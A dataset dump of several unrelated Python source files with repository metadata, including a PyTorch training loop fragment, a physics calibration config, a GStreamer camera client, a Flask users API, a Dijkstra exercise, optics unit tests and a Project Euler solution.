lr = args.lr * (0.1 ** (epoch // 50)) * (0.1 ** (epoch // 90))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
best_loss = None
if load_model:
best_loss = test(0)
if res_flag == 0:
Ei = 1
else:
if args.resume[-6] == '_':
Ei = int(args.resume[-5]) + 1
print('-' * 89)
print('Resuming from epoch %d' % (Ei))
print('-' * 89)
else:
Ei = int(args.resume[-6:-4]) + 1
print('-' * 89)
print('Resuming from epoch %d' % (Ei))
print('-' * 89)
try:
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(Ei, args.epochs + 1):
epoch_start_time = time.time()
train(epoch, criterion, optimizer)
test_loss, test_acc = test(epoch)
if test_acc> best_acc:
best_acc = test_acc
best_model_wts = copy.deepcopy(model.state_dict())
filename = args.outf + '/complete_model'+ '_BEST.pth'
state = {'epoch': epoch , 'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict() }
torch.save(state, filename)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s ({:.2f}h)'.format(
epoch, time.time() - epoch_start_time, (time.time() - epoch_start_time)/3600.0))
print('-' * 89)
# Save trained model
filename = args.outf + '/complete_model_' + str(epoch)+ '.pth'
state = {'epoch': epoch , 'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict() }
torch.save(state, filename)
except KeyboardInterrupt:
print('-' * 89)
print('Exiting from training early')
|
[
"c.gomez10@uniandes.edu.co"
] |
c.gomez10@uniandes.edu.co
|
86f27cb684ca6c3bd735bec9826954a9689029fc
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/LArCalorimeter/LArExample/LArCalibProcessing/python/OFCDefinitions.py
|
630492002d95e84b59dd3ce6c341bcbada3c6668
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949
| 2020-01-19T03:59:35
| 2020-01-19T03:59:35
| 234,836,993
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,026
|
py
|
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
from collections import namedtuple
OFCDefinitions=namedtuple("OFCDefinitions",
["Algoname",
"Nsamples",
"Nphase",
"Dphase",
"PhysAutoCorr",
"useDelta",
"KeyOFC",
"KeyShape",
"FolderOFC",
"FolderShape",
"FolderOFCPicked",
"FolderShapePicked",
"ReadDSPConfig",
"DSPConfigFolder"
]
)
OFCDef_4Samples=OFCDefinitions("OFC4samples",
Nsamples=4,
Nphase=8,
# hack for shifted OFC
#Nphase=16,
Dphase=3,
PhysAutoCorr=(False,True),
useDelta=(0,0),
KeyOFC=("LArOFC_4_0","LArOFC_4_0_mu"),
KeyShape="LArShape_4_0",
FolderOFC="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/4samples3bins17phases",
FolderShape="/LAR/ElecCalibOfl/Shape/RTM/4samples3bins17phases",
FolderOFCPicked="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/4samples1phase",
FolderShapePicked="/LAR/ElecCalibOfl/Shape/RTM/4samples1phase",
ReadDSPConfig=True,
DSPConfigFolder="/LAR/Configuration/DSPConfiguration"
)
OFCDef_5Samples=OFCDefinitions("OFC5samples",
Nsamples=5,
Nphase=8,
# hack for shifted OFC
#Nphase=16,
Dphase=3,
PhysAutoCorr=(False,True),
useDelta=(0,0),
KeyOFC=("LArOFC_5_0","LArOFC_5_0_mu"),
KeyShape="LArShape_5_0",
FolderOFC="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/5samples3bins17phases",
FolderShape="/LAR/ElecCalibOfl/Shape/RTM/5samples3bins17phases",
FolderOFCPicked="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/5samples1phase",
FolderShapePicked="/LAR/ElecCalibOfl/Shape/RTM/5samples1phase",
ReadDSPConfig=True,
DSPConfigFolder="/LAR/Configuration/DSPConfiguration"
)
OFCDefs=(OFCDef_5Samples,OFCDef_4Samples)
#OFCDefsRepro=(OFCDef_4Samples,0)
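# Example (illustrative, added): fields of the definitions are read by
# attribute, e.g. OFCDef_5Samples.Nsamples == 5 and
# OFCDef_5Samples.KeyOFC[1] == 'LArOFC_5_0_mu'.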
|
[
"rushioda@lxplus754.cern.ch"
] |
rushioda@lxplus754.cern.ch
|
ee9e07d81c1e093c2c6a65b7fd4a8d2c5b8b737d
|
cdc3ee98954fc86bc816980e0dab767be3bbb0b5
|
/app.py
|
6d3ef9cbbf94259099da5bfd94d63b8d8c9c0bf1
|
[] |
no_license
|
uniray7/resp-pi-cam
|
2199808569d695276032e1201572730a630edcac
|
98d0870c1719898ea9d889f432f007f479270fd4
|
refs/heads/master
| 2020-12-30T13:40:17.320095
| 2017-05-14T13:02:25
| 2017-05-14T13:02:25
| 91,242,689
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,191
|
py
|
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
import cv2
import numpy
img_arr =None
def new_sample(appsink):
global img_arr
sample = appsink.emit('pull-sample')
buf = sample.get_buffer()
caps = sample.get_caps()
print caps.get_structure(0).get_value('format')
print caps.get_structure(0).get_value('height')
print caps.get_structure(0).get_value('width')
print buf.get_size()
arr = numpy.ndarray(
(caps.get_structure(0).get_value('height'),
caps.get_structure(0).get_value('width'),
3),
buffer=buf.extract_dup(0, buf.get_size()),
dtype=numpy.uint8)
img_arr = arr
return Gst.FlowReturn.OK
def start_consume():
Gst.init(None)
pipeline = Gst.Pipeline()
tcpsrc = Gst.ElementFactory.make('tcpclientsrc','source')
tcpsrc.set_property("host", "172.20.10.12")
tcpsrc.set_property("port", 5000)
gdepay = Gst.ElementFactory.make('gdpdepay', 'gdepay')
rdepay = Gst.ElementFactory.make('rtph264depay')
avdec = Gst.ElementFactory.make('avdec_h264')
vidconvert = Gst.ElementFactory.make('videoconvert')
asink = Gst.ElementFactory.make('appsink', 'sink')
asink.set_property('sync', False)
asink.set_property('emit-signals', True)
asink.set_property('drop', True)
caps = Gst.caps_from_string("video/x-raw, format=(string){BGR, GRAY8}; video/x-bayer,format=(string){rggb,bggr,grbg,gbrg}")
asink.set_property("caps", caps)
asink.connect('new-sample', new_sample)
pipeline.add(tcpsrc)
pipeline.add(gdepay)
pipeline.add(rdepay)
pipeline.add(avdec)
pipeline.add(vidconvert)
pipeline.add(asink)
tcpsrc.link(gdepay)
gdepay.link(rdepay)
rdepay.link(avdec)
avdec.link(vidconvert)
vidconvert.link(asink)
pipeline.set_state(Gst.State.PLAYING)
return pipeline
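
# For reference (added note), the pipeline assembled above is roughly the
# gst-launch-1.0 line below, with an appsink in place of the display sink:
#   gst-launch-1.0 tcpclientsrc host=172.20.10.12 port=5000 ! gdpdepay ! \
#       rtph264depay ! avdec_h264 ! videoconvert ! autovideosink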
if __name__ == "__main__":
try:
pipeline = start_consume()
bus = pipeline.get_bus()
while True:
message = bus.timed_pop_filtered(10000, Gst.MessageType.ANY)
if img_arr is not None:
cv2.imshow("appsink image arr", img_arr)
cv2.waitKey(1)
    except KeyboardInterrupt:
        print "Closing pipeline"
        pipeline.set_state(Gst.State.NULL)
|
[
"uniray7@gmail.com"
] |
uniray7@gmail.com
|
48b762312553cd9cc610d46d0e8cf948fa131020
|
0faac0c32c47715b7b6c3c96264a0cc4cbe9bfca
|
/Hello/test/Step18_File2.py
|
cc8012ee481dbaa050b4f3a9b3e20fbefebea06a
|
[] |
no_license
|
hyunhee7/python_work
|
339a61c2361a8b37bd7c2c04b7ae5b92c63fb5b2
|
31adb3105fcad6254327f3c383d905b7592cd4af
|
refs/heads/master
| 2021-01-15T13:29:25.231833
| 2017-08-22T09:38:11
| 2017-08-22T09:38:11
| 99,674,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,602
|
py
|
#-*- coding: utf-8 -*-
import re
import os
import codecs
sample = u"a b c ddd eee"
result=re.split(r"[\t]+",sample)
print result
cwd=os.getcwd()
filePath=cwd+os.sep+"testFile.txt"
f=codecs.open(filePath,"r","utf-8")
while True:
    data=f.readline()
    if data=="":
        break  # leave the read loop
    print data
f.close()
# Following the example above, read a search keyword from the user
inputKeyword=raw_input("Enter the dong/myeon/ri (district) to search: ")
decodedKeyword=inputKeyword.decode("utf-8")
# Print every address that contains the keyword.
# open the zip code file
zipPath=os.getcwd()+os.sep+"zipcode.txt"
zipFile=codecs.open(zipPath,"r","utf-8")
print u"Searching..."
while True:
    # read one line at a time
    data=zipFile.readline()
    if data=="":
        break
    # split the line into a list
    info=re.split(r"[\t ]+", data)
    # check whether the keyword appears in the fourth field (index 3)
    result = bool(re.search(decodedKeyword, info[3]))
    if result:
        print data
zipFile.close()
# open the file again
zipFile=codecs.open(zipPath,"r","utf-8")
# Print the zip code for an entered district name
inputKeyword=raw_input("Enter the district whose zip code you want: ")
decodedKeyword=inputKeyword.decode("utf-8")
print "Searching..."
while True:
    data=zipFile.readline()
    if data=="":
        break
    info=re.split(r"[\t ]+", data)
    result = bool(re.search(decodedKeyword, info[3]))
    if result:
        print decodedKeyword, "zip code:", info[0]
zipFile.close()
|
[
"hyunhi7@naver.com"
] |
hyunhi7@naver.com
|
76e6c696bc83ab86a4ee1ee00fc9368eb01b4cd9
|
cd208b4a40be8bf166da79fdc126dbcb71e95a7d
|
/app/handlers/states/fridge_expiration_date_error.py
|
75c7ccfc48b996199ca1a48138350c74efbc7c24
|
[
"MIT"
] |
permissive
|
Moirted/MyPersonalKitchenBot
|
63a2b1be6e21e90ed908c9f3162bd085162cd83f
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
refs/heads/main
| 2023-04-21T12:17:52.486113
| 2021-05-16T13:00:22
| 2021-05-16T13:00:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 463
|
py
|
import re
from aiogram import types
from app.misc import dp
from app.states import FridgeProductState
@dp.message_handler(lambda msg: not re.search(r'^\d{1,2}\.\d{1,2}\.\d{4}$', msg.text), state=FridgeProductState.expiration_date)
async def handler_fridge_expiration_date_error(msg: types.Message):
    return await msg.answer('Incorrect date format!\nEnter the expiration date in the "dd.mm.yyyy" format')
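# Quick sanity check of the date filter above (illustrative only):
#   >>> import re
#   >>> bool(re.search(r'^\d{1,2}\.\d{1,2}\.\d{4}$', '16.05.2021'))
#   True
#   >>> bool(re.search(r'^\d{1,2}\.\d{1,2}\.\d{4}$', '2021-05-16'))
#   False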
|
[
"ka.kovjarova@gmail.com"
] |
ka.kovjarova@gmail.com
|
8e504f26c47a2b948e4431092fbbffd69d254a57
|
a1119965e2e3bdc40126fd92f4b4b8ee7016dfca
|
/branches/repy_v2/portability/tests/py_z_test_importcachedir_recursive.py
|
abec03bba9894531fbe8825ee4f921f2be201cb4
|
[
"MIT"
] |
permissive
|
SeattleTestbed/attic
|
0e33211ddf39efdbcf5573d4fc7fa5201aa7310d
|
f618a962ce2fd3c4838564e8c62c10924f5df45f
|
refs/heads/master
| 2021-06-10T23:10:47.792847
| 2017-05-15T12:05:43
| 2017-05-15T12:05:43
| 20,154,061
| 0
| 1
| null | 2014-10-16T17:21:06
| 2014-05-25T12:34:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,395
|
py
|
"""
Test if a call to importcachedir is handled well.
"""
import repyhelper
import os
import sys
import shutil
# clean up any left over data...
try:
shutil.rmtree('importcachetest')
except (OSError, IOError):
# it's okay if it doesn't exist...
pass
os.mkdir('importcachetest')
# append this to the Python path...
sys.path = sys.path + ['importcachetest']
# write files there
repyhelper.set_importcachedir('importcachetest')
repyhelper.translate_and_import('rhtestrecursion_1.r2py')
# This should work...
try:
# note: this is a function from rhtest_recursion_1. I'm not calling it...
one
except NameError:
print "Failed to import rhtest_recursion_1 when using importcachetest"
# This should work...
try:
# note: this is a function from rhtest_recursion_2. I'm not calling it...
two
except NameError:
print "Failed to import rhtest_recursion_2 when using importcachetest"
# and the files should be in importcachetest...
if not os.path.exists('importcachetest/rhtestrecursion_1_repy.py'):
print "The rhtest_recursion_1.r2py file was not preprocessed to importcache test because 'importcachetest/rhtest_recursion_1_repy.py' does not exist"
if not os.path.exists('importcachetest/rhtestrecursion_2_repy.py'):
print "The rhtest_recursion_2.r2py file was not preprocessed to importcache test because 'importcachetest/rhtest_recursion_2_repy.py' does not exist"
|
[
"USER@DOMAIN"
] |
USER@DOMAIN
|
082aebcc4bdbe996a74214e3ea8ffb28e8db2238
|
0b06cfba4d3670dfa7bda5345bec3bba82b465bb
|
/tests/test_otf.py
|
ae47b46fa5f19c73ce80141113edf6ce6e14a5ff
|
[
"MIT"
] |
permissive
|
chllym/prysm
|
f570151783cd613af4fddc3ca4a5d207deac23ee
|
579dfc0ae58fab5e396a13613da7f87d2484f083
|
refs/heads/master
| 2020-04-01T01:56:33.808037
| 2018-09-09T00:48:46
| 2018-09-09T00:48:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,204
|
py
|
''' Optical Transfer Function (OTF) unit tests.
'''
import pytest
import numpy as np
from prysm import otf
from prysm.fttools import forward_ft_unit
SAMPLES = 32
LIM = 1e3
@pytest.fixture
def mtf():
x, y = forward_ft_unit(1/1e3, 128), forward_ft_unit(1/1e3, 128)
xx, yy = np.meshgrid(x, y)
dat = np.sin(xx)
return otf.MTF(data=dat, unit_x=x) # do not pass unit_y, simultaneous test for unit_y=None
def test_mtf_plot2d_functions(mtf):
fig, ax = mtf.plot2d()
assert fig
assert ax
def test_mtf_plot_tan_sag_functions(mtf):
fig, ax = mtf.plot_tan_sag()
assert fig
assert ax
@pytest.mark.parametrize('azimuth', [None, 0, [0, 90, 90, 90]])
def test_mtf_exact_polar_functions(mtf, azimuth):
freqs = [0, 1, 2, 3]
mtf_ = mtf.exact_polar(freqs, azimuth)
assert type(mtf_) is np.ndarray
@pytest.mark.parametrize('y', [None, 0, [0, 1, 2, 3]])
def test_mtf_exact_xy_functions(mtf, y):
x = [0, 1, 2, 3]
mtf_ = mtf.exact_xy(x, y)
assert type(mtf_) is np.ndarray
def test_mtf_exact_tan_functions(mtf):
assert type(mtf.exact_tan(0)) is np.ndarray
def test_mtf_exact_sag_functions(mtf):
assert type(mtf.exact_sag(0)) is np.ndarray
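# To run just this module (typical pytest invocation, shown for convenience):
#   python -m pytest tests/test_otf.py -v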
|
[
"brandondube@gmail.com"
] |
brandondube@gmail.com
|
f9943ec6fc0cdb50adebc68165cf6d6842c97bee
|
a81386ef282db3302efcb051e63c7d5cfc1f46f1
|
/api_server.py
|
e75f4d7194f184de9e96207e1de19f3938b4b114
|
[] |
no_license
|
yilisong007/blog-test
|
ede870ac77c834120313f49554a7c188437e53d8
|
84295d7c58251824176cd08842bb444acd11f5fd
|
refs/heads/master
| 2020-12-09T16:51:42.842449
| 2020-06-22T01:36:43
| 2020-06-22T01:36:43
| 233,362,639
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
import json
from flask import Flask
from flask import request, make_response
app = Flask(__name__)
users_dict = {}
@app.route('/api/users/<int:uid>', methods=['POST'])
def create_user(uid):
user = request.get_json()
if uid not in users_dict:
result = {
'success': True,
'msg': "user created successfully."
}
status_code = 201
users_dict[uid] = user
else:
result = {
'success': False,
'msg': "user already existed."
}
status_code = 500
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/users/<int:uid>', methods=['PUT'])
def update_user(uid):
user = users_dict.get(uid, {})
if user:
        user = request.get_json()
        users_dict[uid] = user  # persist the update; without this the PUT changed nothing
success = True
status_code = 200
else:
success = False
status_code = 404
result = {
'success': success,
'data': user
}
response = make_response(json.dumps(result), status_code)
response.headers["Content-Type"] = "application/json"
return response
if __name__ == '__main__':
app.run()
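# Illustrative exercise of both endpoints with Flask's built-in test client
# (a sketch, not part of the original module):
#
#   with app.test_client() as client:
#       assert client.post('/api/users/1', json={'name': 'alice'}).status_code == 201
#       assert client.post('/api/users/1', json={'name': 'alice'}).status_code == 500
#       assert client.put('/api/users/1', json={'name': 'bob'}).status_code == 200
#       assert client.put('/api/users/2', json={'name': 'eve'}).status_code == 404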
|
[
"781095668@qq.com"
] |
781095668@qq.com
|
921b0a3858fedb52134f99f183054625c52f8e55
|
277a1801abb3eb9886f016e2f5d39a5c5960507f
|
/kitna_paise.py
|
06903dc2f6702d473164d66ae8a7d9a9e387f933
|
[] |
no_license
|
maurya-subhashini1/List
|
ede3df015b8e3e2e51212fb2df49de936219be18
|
9d8d23950dc2aab3310060cc6123ed76a8e86508
|
refs/heads/main
| 2023-05-14T10:37:06.070670
| 2021-06-01T10:41:27
| 2021-06-01T10:41:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 427
|
py
|
kitna_paisa_hai = [3000, 600000, 324990909, 90990900, 30000, 5600000, 690909090, 31010101, 532010, 510, 4100]
i=0
l=[]
k=[]
h=[]
while i<len(kitna_paisa_hai):
if kitna_paisa_hai[i]>=10000000:
l.append(kitna_paisa_hai[i])
elif kitna_paisa_hai[i]>=100000:
k.append(kitna_paisa_hai[i])
else:
h.append(kitna_paisa_hai[i])
i=i+1
print("crodpati=",l)
print("lakhpati=",k)
print("Diwale=",h)
|
[
"noreply@github.com"
] |
maurya-subhashini1.noreply@github.com
|
1faf668a6ae2562426ca1664a4dbc27ce79a797e
|
bd04d6c138665d01349f62d912514c5a7343a6d0
|
/algorithm/다익스트라.py
|
3e969d4ecebc379059c1c964fa6a9909b4f66271
|
[] |
no_license
|
gvg4991/TIL
|
fe6209c21a228d3500ca64615df2f1066a5d0f11
|
ada8fbdc88555d327beae2ae8eee16b4739240aa
|
refs/heads/master
| 2021-06-08T06:44:37.554473
| 2021-06-06T09:06:47
| 2021-06-06T09:06:47
| 162,512,003
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,262
|
py
|
import sys
sys.stdin = open('input.txt')
n,k = map(int,input().split()) # number of nodes, number of edges
datas = [[987654321]*n for _ in range(n)]
for case in range(k):
start,end,dist = map(str,input().split())
if start == 'a': start = 0
elif start == 'b': start = 1
elif start == 'c': start = 2
elif start == 'd': start = 3
elif start == 'e': start = 4
elif start == 'f': start = 5
if end == 'a': end = 0
elif end == 'b': end = 1
elif end == 'c': end = 2
elif end == 'd': end = 3
elif end == 'e': end = 4
elif end == 'f': end = 5
datas[start][end] = int(dist)
# print(datas)
begin = 0
distance = datas[begin] # the initial distance list holds distances from node 0, the start
# print(distance)
# for now in range(n):
# if not distance[now]:
# distance[now] = 987654321
# print(distance)
# node = [0]*n
# for i in range(n):
# node[i] = i
# # print(node)
node = [1,2,3,4,5] # remaining nodes (everything except the start node 0)
path = []
while node:
result = 987654321
# print(distance)
    for now in node: # go over the remaining nodes in order
# print(now)
        if distance[now] < result: # if this node's distance is smaller than the best so far
            result = distance[now] # store this distance in result (3
    idx = distance.index(result) # extract the index of that smallest value
    path.append(idx) # add it to the path
# print(idx)
    node.remove(idx) # remove the node with that index
    for next in node: # to pick the next element, go over the nodes left after removal, in order
        # print('#{} {} {}'.format(distance[next],distance[idx],datas[idx][next])) # known distance to the target, distance to the current node, edge from the current node to the target
        if distance[next] > distance[idx] + datas[idx][next]: # if going through the current node is shorter than the known distance
distance[next] = distance[idx] + datas[idx][next]
print(distance[-1])
print(path)
# while node:
# result = 987654321
# for next in range(n):
# if not next in visited and distance[next] < result:
# result = distance[next]
# now = distance.index(result)
# visited.append(now)
# # for target in range(n):
# # if not target in visited and distance[target] > datas[now][target]:
# # distance[target] = datas[now][target]
# print(distance)
# print(visited)
# begin = 0
# distance = datas[begin]
# visited = []
# while len(visited) < n:
# result = 987654321
# for next in range(n):
# if not next in visited and distance[next] < result:
# result = distance[next]
# now = distance.index(result)
# visited.append(now)
# # for target in range(n):
# # if not target in visited and distance[target] > datas[now][target]:
# # distance[target] = datas[now][target]
# print(distance)
# print(visited)
# if result > distance[next]:
# result = distance[next] #3
# now = next #b
# def dijkstra(s,e,d):
#     if finished
#
# distance = datas[s]
# result = 987654321
# for next in range(n):
# if result > distance[next]:
# result = distance[next] # 3
# now = next # b
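# (The a..f letter mapping above could also be written as ord(letter) - ord('a').)
#
# A more conventional Dijkstra over the same adjacency matrix, using a binary
# heap (an illustrative sketch, not part of the original solution; `matrix` is
# assumed square, with 987654321 standing in for "no edge"):
#
# import heapq
# def dijkstra(matrix, source=0, inf=987654321):
#     n = len(matrix)
#     dist = [inf] * n
#     dist[source] = 0
#     heap = [(0, source)]                 # (distance, node)
#     while heap:
#         d, u = heapq.heappop(heap)
#         if d > dist[u]:                  # stale heap entry, skip it
#             continue
#         for v in range(n):
#             nd = d + matrix[u][v]
#             if nd < dist[v]:             # shorter route to v via u
#                 dist[v] = nd
#                 heapq.heappush(heap, (nd, v))
#     return dist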
|
[
"14.73oo6o19@gmail.com"
] |
14.73oo6o19@gmail.com
|
b23744c68c3c3cd3a868e3bb9976c9740efd0960
|
72be8cdac574c94e2aa094ff6022f232a285831b
|
/Python/013.py
|
d2882a8e09f31219c6ff7057c35bbff6f4e11b5c
|
[
"MIT"
] |
permissive
|
jaimeliew1/Project_Euler_Solutions
|
1def5a2514687f9546db1a025416004229352201
|
d014acd22be7f8920865058a48415072ffc7961f
|
refs/heads/master
| 2022-12-01T08:20:02.554540
| 2022-11-23T21:40:42
| 2022-11-23T21:40:42
| 126,694,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,437
|
py
|
# -*- coding: utf-8 -*-
"""
Solution to Project Euler problem 13
Author: Jaime Liew
https://github.com/jaimeliew1/Project_Euler_Solutions
"""
data = '''37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690'''
def run():
numbers = []
for line in data.split('\n'):
numbers.append(int(line))
return str(sum(numbers))[:10]
if __name__ == "__main__":
print(run())
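# Note: only the ten leading digits are requested, so a common shortcut
# (a sketch; the full sum above is already instant in Python) sums just a
# prefix of each number, keeping one guard digit:
#   str(sum(int(line[:11]) for line in data.split('\n')))[:10]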
|
[
"33415790+jaimeliew1@users.noreply.github.com"
] |
33415790+jaimeliew1@users.noreply.github.com
|